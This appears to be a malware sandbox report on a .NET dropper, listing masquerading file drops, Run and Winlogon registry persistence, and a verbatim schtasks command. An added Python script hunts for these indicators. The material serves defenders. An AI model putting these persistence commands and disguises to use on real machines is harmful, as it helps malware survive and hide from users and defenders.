                    Source: USZqVcJFLA.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: RuntimeBroker.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: SystemSettings.exe.0.dr, _.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9B856FEA push E9000000h; retf 0_2_00007FFD9B857009
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9B855C63 pushad ; ret 0_2_00007FFD9B855C75
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9B8500BD pushad ; iretd 0_2_00007FFD9B8500C1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC43FCC push ebx; ret 0_2_00007FFD9BC4464A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC442D0 push ebx; ret 0_2_00007FFD9BC4464A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC449A9 push ebp; ret 0_2_00007FFD9BC449AA
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC448F9 push ebp; ret 0_2_00007FFD9BC4490A
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC4B0BE push edi; ret 0_2_00007FFD9BC4B0C6
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Code function: 0_2_00007FFD9BC4BE1E push edi; ret 0_2_00007FFD9BC4BE33
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9B896FEA push E9000000h; retf 53_2_00007FFD9B897009
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9B895C63 pushad ; ret 53_2_00007FFD9B895C75
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8C01F push ebp; ret 53_2_00007FFD9BC8C020
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC88C08 push es; ret 53_2_00007FFD9BC88C09
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC87BB0 pushfd ; ret 53_2_00007FFD9BC87BC0
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8774C push ds; ret 53_2_00007FFD9BC8774F
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8AF14 pushad ; ret 53_2_00007FFD9BC8AF1C
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8BE60 push ebx; ret 53_2_00007FFD9BC8BE61
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8BE92 push edx; ret 53_2_00007FFD9BC8BE93
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8BD74 push esp; ret 53_2_00007FFD9BC8BD75
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 53_2_00007FFD9BC8BD05 push esp; ret 53_2_00007FFD9BC8BD06
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Code function: 54_2_00007FFD9B866FEA push E9000000h; retf 54_2_00007FFD9B867009
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Code function: 54_2_00007FFD9B865C63 pushad ; ret 54_2_00007FFD9B865C75
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | Code function: 54_2_00007FFD9B8600BD pushad ; iretd 54_2_00007FFD9B8600C1
                    Source: C:\Recovery\USZqVcJFLA.exe | Code function: 55_2_00007FFD9B875921 pushad ; retf 55_2_00007FFD9B87592D
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B878C6E push ds; retf 55_2_00007FFD9B878C71
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B878C76 push es; retf 55_2_00007FFD9B878C89
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B866FEA push E9000000h; retf 55_2_00007FFD9B867009
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B865C63 pushad ; ret 55_2_00007FFD9B865C75
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B8600BD pushad ; iretd 55_2_00007FFD9B8600C1
                    Source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, COBCbYgFOBBqPH8A72G.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'I28NqZ5PyvM', 'q3JNgNUhB4d', 's2EPQdNr3gKiKSNcsarg', 'nbu1IjNrHa2SbtHIbcSI', 'UHaC3nNr0n557S7PWZVo', 'y9B8EsNr1eXQyn3B8exT', 'uKAOR7NrffGAluuQ6gQ6'

                    Persistence and Installation Behavior

Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 occurrences)
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Users\user\Favorites\lsass.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Users\user\Desktop\uhdUZoxx.log
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Recovery\USZqVcJFLA.exe
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Users\user\Desktop\AsBtWtog.log
Source: C:\Recovery\USZqVcJFLA.exe | File created: C:\Users\user\Desktop\EDQjSEMY.log
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Users\user\Desktop\vnccfbfp.log
Source: C:\Recovery\USZqVcJFLA.exe | File created: C:\Users\user\Desktop\bSdYXpxm.log
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Users\user\Desktop\RzSYqgUu.log
Source: C:\Recovery\USZqVcJFLA.exe | File created: C:\Users\user\Desktop\oBKeyAWK.log
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | File created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
Source: C:\Recovery\USZqVcJFLA.exe | File created: C:\Users\user\Desktop\OljzCgRG.log

                    Boot Survival

Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 occurrences)
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettings
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4
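The persistence and installation entries above (system-process names such as lsass.exe and RuntimeBroker.exe dropped outside the directories they ship in, the Winlogon Shell change, the Run values, the minute-interval schtasks job with /rl HIGHEST, and csc.exe compiling a response file out of %TEMP%) can be turned into a host-telemetry hunt. The Python below is an added example and is not part of the Joe Sandbox report or of the sample. The event records it scans are constructed to mirror the report's entries plus two benign decoys; the Run and Winlogon data strings are assumed (the report lists only value names), and the legitimate-directory table and drop-directory list are the author's assumptions, not output of the sandbox.

```python
"""Hunt for this report's persistence indicators in Sysmon-style telemetry.

Added example, not part of the Joe Sandbox report. The legitimate-directory
table, the drop-directory list and the registry data strings are assumptions
modelled on the report's entries, not values taken from the sample.
"""
import re
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Directory each impersonated system binary ships in (lower-case, no trailing slash).
LEGIT_DIRS = {
    "lsass.exe": {r"c:\windows\system32"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "systemsettings.exe": {r"c:\windows\immersivecontrolpanel"},
}
# Drop locations used by this sample; no legitimate installer writes executables there.
DROP_DIRS = (r"c:\recovery", r"\favorites", r"\desktop")

SCHTASKS_RE = re.compile(r"/sc\s+minute\b.*/rl\s+highest", re.I)
TASK_TARGET_RE = re.compile(r"""/tr\s+["']*([^"']+)""", re.I)
CSC_TEMP_RE = re.compile(r"csc\.exe.*\\appdata\\local\\temp\\.*\.cmdline", re.I)


def _clean(path: str) -> PureWindowsPath:
    return PureWindowsPath(path.strip().strip('"'))


def system_name_misplaced(image: str) -> Optional[str]:
    """'Files With System Process Name In Unsuspected Locations': a system
    binary name whose parent directory is not the one it ships in."""
    p = _clean(image)
    name = p.name.lower()
    if name not in LEGIT_DIRS or str(p.parent).lower() in LEGIT_DIRS[name]:
        return None
    return f"{p.name} outside its expected directory: {p}"


def in_drop_dir(image: str) -> bool:
    parent = str(_clean(image).parent).lower()
    return any(d in parent for d in DROP_DIRS)


def check_process(cmdline: str) -> List[str]:
    reasons = []
    if "schtasks" in cmdline.lower() and SCHTASKS_RE.search(cmdline):
        reasons.append("schtasks: repeating MINUTE task created with /rl HIGHEST")
        m = TASK_TARGET_RE.search(cmdline)
        why = system_name_misplaced(m.group(1)) if m else None
        if why:
            reasons.append(f"schtasks target: {why}")
    if CSC_TEMP_RE.search(cmdline):
        reasons.append("csc.exe compiling a .cmdline response file out of %TEMP%")
    return reasons


def check_file(path: str) -> List[str]:
    why = system_name_misplaced(path)
    return [f"dropped file: {why}"] if why else []


def check_registry(key: str, value_name: str, data: str) -> List[str]:
    k = key.lower()
    if k.endswith(r"\winlogon") and value_name.lower() == "shell":
        # The default Shell value is exactly "explorer.exe"; anything appended runs at logon.
        return [] if data.strip().lower() == "explorer.exe" else [f"Winlogon Shell changed to: {data}"]
    if k.endswith(r"\currentversion\run"):
        why = system_name_misplaced(data)
        if why:
            return [f"Run value {value_name}: {why}"]
        if in_drop_dir(data):
            return [f"Run value {value_name} points into a drop directory: {data}"]
    return []


def hunt(events) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event that matches an indicator."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            reasons = check_process(ev["cmdline"])
        elif ev["type"] == "file":
            reasons = check_file(ev["path"])
        else:
            reasons = check_registry(ev["key"], ev["value"], ev["data"])
        findings.extend((i, r) for r in reasons)
    return findings


# Constructed telemetry mirroring the report's entries, plus benign decoys (events 2, 5, 9).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r'''schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f'''},
    {"type": "process", "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"'},
    {"type": "process", "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
    {"type": "file", "path": r"C:\Users\user\Favorites\lsass.exe"},
    {"type": "file", "path": r"C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe"},
    {"type": "file", "path": r"C:\Windows\System32\RuntimeBroker.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "value": "Shell", "data": r"explorer.exe, C:\Recovery\USZqVcJFLA.exe"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "RuntimeBroker", "data": r"C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "USZqVcJFLA", "data": r"C:\Recovery\USZqVcJFLA.exe"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for idx, reason in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The per-binary directory table is the check that matters most here: RuntimeBroker.exe and SystemSettings.exe are real Windows names, so a hunt keyed on the file name alone would drown in legitimate hits, while a hunt keyed on name plus parent directory isolates exactly the drops this report lists. On a live host the same three checks map onto Sysmon event IDs 1 (process), 11 (file create) and 13 (registry set).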

                    Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (24 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (18 occurrences)
Source: C:\Users\user\Desktop\JNKHlxGvw4.exe | Process information set: NOOPENFILEERRORBOX (52 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\Favorites\lsass.exe | Process information set: NOOPENFILEERRORBOX (48 occurrences)
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\USZqVcJFLA.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
